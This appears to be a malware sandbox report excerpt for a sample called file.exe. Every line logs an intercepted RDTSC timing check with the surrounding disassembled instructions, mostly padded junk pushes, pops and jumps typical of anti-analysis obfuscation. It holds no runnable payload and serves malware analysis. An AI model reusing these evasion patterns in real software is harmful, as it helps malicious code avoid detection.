Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183CF second address: 8183DD instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183DD second address: 8183E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8183E1 second address: 8183E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81880D second address: 81882C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CA0 second address: 818CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CA6 second address: 818CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CAC second address: 818CFB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C85h 0x00000007 js 00007FF0EC517C76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007FF0EC517C99h 0x00000015 jmp 00007FF0EC517C89h 0x0000001a jmp 00007FF0EC517C7Ah 0x0000001f pop edx 0x00000020 pop eax 0x00000021 push edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818CFB second address: 818D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818D01 second address: 818D05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 818D05 second address: 818D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F257 second address: 81F25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F25B second address: 81F290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007FF0EC6B64D1h 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 pop eax 0x00000015 jmp 00007FF0EC6B64CAh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F40F second address: 81F413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F413 second address: 81F41F instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF0EC6B64C6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F6B7 second address: 81F6BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F6BB second address: 81F6BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F922 second address: 81F92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81F92E second address: 81F932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81FA6F second address: 81FA73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81FA73 second address: 81FA79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 81FBD4 second address: 81FC2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FF0EC517C81h 0x0000000a jmp 00007FF0EC517C85h 0x0000000f popad 0x00000010 pop ebx 0x00000011 ja 00007FF0EC517C9Eh 0x00000017 push ebx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c pop ebx 0x0000001d js 00007FF0EC517C92h 0x00000023 jmp 00007FF0EC517C86h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A09 second address: 829A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A0D second address: 829A13 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A13 second address: 829A40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CFh 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ebx 0x00000014 jmp 00007FF0EC6B64CEh 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A40 second address: 829A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829A48 second address: 829A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 829B98 second address: 829B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 83BB4A second address: 83BB5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 84982B second address: 84984D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF0EC517C88h 0x0000000a popad 0x0000000b push edx 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850711 second address: 85071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85071B second address: 850721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850721 second address: 850727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850727 second address: 85073A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jno 00007FF0EC517C76h 0x00000009 jns 00007FF0EC517C76h 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 85073A second address: 850740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850899 second address: 8508B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jnc 00007FF0EC517C76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8508B6 second address: 8508BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850B89 second address: 850B93 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF0EC517C7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 850E73 second address: 850E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856EA9 second address: 856EC0 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF0EC517C7Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856EC0 second address: 856EC5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 856EC5 second address: 856ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jnp 00007FF0EC517C7Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 866610 second address: 866619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 866619 second address: 86661D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A9D5 second address: 88A9F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A9F1 second address: 88AA09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FF0EC517C7Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8898F5 second address: 889905 instructions: 0x00000000 rdtsc 0x00000002 js 00007FF0EC6B64D2h 0x00000008 ja 00007FF0EC6B64C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889905 second address: 88990E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88990E second address: 88991E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC6B64CAh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88991E second address: 88992F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FF0EC517C78h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889BF3 second address: 889BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FF0EC6B64C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889BFE second address: 889C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jnc 00007FF0EC517C7Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jbe 00007FF0EC517C7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889C1D second address: 889C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jmp 00007FF0EC6B64D6h 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 889C39 second address: 889C45 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF0EC517C7Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6C2 second address: 88A6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6C8 second address: 88A6CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6CC second address: 88A6D6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88A6D6 second address: 88A6DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF54 second address: 88BF58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF58 second address: 88BF6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ch 0x00000009 jno 00007FF0EC517C76h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF6E second address: 88BF72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 88BF72 second address: 88BFA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0EC517C76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d jg 00007FF0EC517C76h 0x00000013 jg 00007FF0EC517C76h 0x00000019 pop edx 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FF0EC517C87h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890491 second address: 8904C4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64CCh 0x00000008 jl 00007FF0EC6B64C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 jg 00007FF0EC6B64C8h 0x00000018 pushad 0x00000019 jmp 00007FF0EC6B64D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 890835 second address: 89088B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0EC517C7Ah 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push edi 0x0000000e pushad 0x0000000f popad 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push ebx 0x00000017 jmp 00007FF0EC517C88h 0x0000001c pop ebx 0x0000001d mov eax, dword ptr [eax] 0x0000001f push edx 0x00000020 jmp 00007FF0EC517C7Fh 0x00000025 pop edx 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d jc 00007FF0EC517C76h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893A96 second address: 893A9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893A9A second address: 893AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893AA0 second address: 893AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 893AAC second address: 893AB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8956A1 second address: 8956C4 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b jng 00007FF0EC6B64C6h 0x00000011 jc 00007FF0EC6B64C6h 0x00000017 pop esi 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jbe 00007FF0EC6B64CCh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8956C4 second address: 8956C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 8956C8 second address: 8956D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FF0EC6B64C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50390 second address: 4F50394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50394 second address: 4F503AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50469 second address: 4F5046F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5046F second address: 4F50473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50473 second address: 4F50477 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50477 second address: 4F504D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FF0EC6B64D2h 0x00000010 jmp 00007FF0EC6B64D5h 0x00000015 popfd 0x00000016 jmp 00007FF0EC6B64D0h 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 jmp 00007FF0EC6B64CEh 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F504D1 second address: 4F504D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F504D5 second address: 4F504D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50524 second address: 4F5053F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5053F second address: 4F50545 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50545 second address: 4F50549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50549 second address: 4F5054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5054D second address: 4F50591 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 call 00007FF15CB3B713h 0x0000000d push 755727D0h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov eax, dword ptr [esp+10h] 0x0000001d mov dword ptr [esp+10h], ebp 0x00000021 lea ebp, dword ptr [esp+10h] 0x00000025 sub esp, eax 0x00000027 push ebx 0x00000028 push esi 0x00000029 push edi 0x0000002a mov eax, dword ptr [75600140h] 0x0000002f xor dword ptr [ebp-04h], eax 0x00000032 xor eax, ebp 0x00000034 push eax 0x00000035 mov dword ptr [ebp-18h], esp 0x00000038 push dword ptr [ebp-08h] 0x0000003b mov eax, dword ptr [ebp-04h] 0x0000003e mov dword ptr [ebp-04h], FFFFFFFEh 0x00000045 mov dword ptr [ebp-08h], eax 0x00000048 lea eax, dword ptr [ebp-10h] 0x0000004b mov dword ptr fs:[00000000h], eax 0x00000051 ret 0x00000052 pushad 0x00000053 push edi 0x00000054 jmp 00007FF0EC517C88h 0x00000059 pop ecx 0x0000005a call 00007FF0EC517C7Bh 0x0000005f mov esi, 26B0FC5Fh 0x00000064 pop esi 0x00000065 popad 0x00000066 and dword ptr [ebp-04h], 00000000h 0x0000006a push eax 0x0000006b push edx 0x0000006c push eax 0x0000006d push edx 0x0000006e push eax 0x0000006f push edx 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50591 second address: 4F50595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50595 second address: 4F50599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50599 second address: 4F5059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5059F second address: 4F505CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF0EC517C85h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F505CC second address: 4F50601 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 jmp 00007FF0EC6B64D3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov esi, edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF0EC6B64D5h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50601 second address: 4F50611 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF0EC517C7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50611 second address: 4F50615 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50722 second address: 4F50727 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50727 second address: 4F50738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, si 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a dec edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50738 second address: 4F5073E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F5073E second address: 4F50744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50744 second address: 4F50748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50748 second address: 4F50786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea ebx, dword ptr [edi+01h] 0x0000000e jmp 00007FF0EC6B64D0h 0x00000013 mov al, byte ptr [edi+01h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF0EC6B64CAh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F50786 second address: 4F5078C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
